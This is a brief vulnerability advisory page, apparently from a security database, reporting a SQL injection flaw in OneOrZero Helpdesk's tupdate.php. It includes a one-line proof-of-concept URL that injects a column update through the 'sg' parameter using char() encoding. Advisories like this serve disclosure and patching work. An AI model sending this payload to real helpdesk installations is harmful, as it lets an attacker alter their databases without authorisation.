• info
• discussion
• exploit
• solution
• references

OneOrZero Helpdesk TUpdate.PHP SQL Injection Vulnerability

The following proof of concept has been supplied:

http://www.example.com/supporter/tupdate.php?groupid=change&sg=groupid,description=char(97,98,99,100)&id=10